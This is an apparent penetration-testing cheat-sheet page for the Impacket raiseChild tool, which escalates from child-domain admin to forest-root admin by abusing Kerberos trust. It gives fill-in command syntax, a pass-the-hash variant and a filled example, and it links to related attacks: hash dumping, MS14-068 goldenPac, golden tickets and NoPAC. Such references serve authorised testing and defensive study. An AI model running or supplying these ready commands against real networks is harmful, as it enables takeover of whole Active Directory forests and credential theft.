Impacket raiseChild
Escalate from child domain DA to forest root DA via inter-realm Kerberos trust
- Tool
- impacket-raiseChild
- Category
- Privilege Escalation / Trust Attacks
- Platform
- linux
- Requires
- password
- Protocols
- KERBEROS, LDAP
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
impacket-raiseChild '<child_domain>/<user>:<password>' -target-exec '<ip>'
Credential variants
The same attack using a different authentication material.
NTLM Hash requires NTLM hash
impacket-raiseChild -hashes ':<hash>' '<child_domain>/<user>' -target-exec '<ip>'
Examples
impacket-raiseChild 'child.corp.local/domainadmin:password' -target-exec '192.168.1.1'
Tags
Related commands
- Impacket PSExec Execute commands via PSExec service
- Impacket Secrets Dump Dump hashes from remote Windows system (SAM, LSA, NTDS)
- Impacket goldenPac (MS14-068) Exploit MS14-068 Kerberos privilege escalation to obtain Domain Admin via forged PAC
- Impacket LookupSID Enumerate domain SIDs and discover trust relationships via SID brute-forcing
- Inter-Realm Golden Ticket Forge a cross-domain Golden Ticket to escalate from child to parent domain
- LDAPSearch Shadow Principals (PAM Trust) Enumerate msDS-ShadowPrincipal objects to identify PAM trust shadow principals
- NetExec LDAP Raise Child Escalate from child domain DA to forest root DA via inter-realm Kerberos trust abuse
- NetExec SMB NoPAC Check for and exploit the NoPAC (CVE-2021-42278/42287) Kerberos privilege escalation…